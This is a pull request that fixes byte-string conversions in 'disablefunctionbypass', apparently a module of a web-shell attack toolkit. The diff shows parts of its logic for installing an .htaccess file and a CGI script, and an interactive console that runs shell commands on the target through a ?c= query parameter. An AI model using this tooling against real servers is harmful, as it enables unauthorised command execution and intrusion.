### PR TITLE
Fix byte string conversions in disablefunctionbypass

### DIFF
--- a/modules/audit/disablefunctionbypass.py
+++ b/modules/audit/disablefunctionbypass.py
@@ -161,4 +161,4 @@ class Disablefunctionbypass(Module):
             if query == 'quit':
                 break
 
-            log.info(http.request('%s?c=%s' % (script_url, query)))
+            log.info(http.request('%s?c=%s' % (script_url, query)).decode())

--- a/modules/audit/disablefunctionbypass.py
+++ b/modules/audit/disablefunctionbypass.py
@@ -154,7 +154,7 @@ class Disablefunctionbypass(Module):
         # Console loop
         while True:
 
-            query = input('CGI shell replacement $ ').strip()
+            query = input('CGI shell replacement $ ').strip().replace(' ', '%20')
 
             if not query:
                 continue

--- a/modules/audit/disablefunctionbypass.py
+++ b/modules/audit/disablefunctionbypass.py
@@ -71,8 +71,8 @@ class Disablefunctionbypass(Module):
             log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)
             return
 
-        filename = strings.randstr(5, charset = string.ascii_lowercase)
-        ext = strings.randstr(3, charset = string.ascii_lowercase)
+        filename = strings.randstr(5, charset = string.ascii_lowercase).decode('utf-8')
+        ext = strings.randstr(3, charset = string.ascii_lowercase).decode('utf-8')
 
         result_install_htaccess = self.vectors.get_result(
             'install_htaccess', 
@@ -124,10 +124,10 @@ class Disablefunctionbypass(Module):
     def _check_response(self, script_url):
 
         script_query = '%s?c=' % (script_url)
-        query_random_str = strings.randstr(5)
+        query_random_str = strings.randstr(5).decode('utf-8')
         command_query = '%secho%%20%s' % (script_query, query_random_str)
 
-        result_request = http.request(command_query)
+        result_request = http.request(command_query).decode('utf-8')
 
         return query_random_str in result_request
 


### PR DESCRIPTION
Correctly encodes raw byte strings as utf-8 strings (so they don't get written to a file as b'<string>')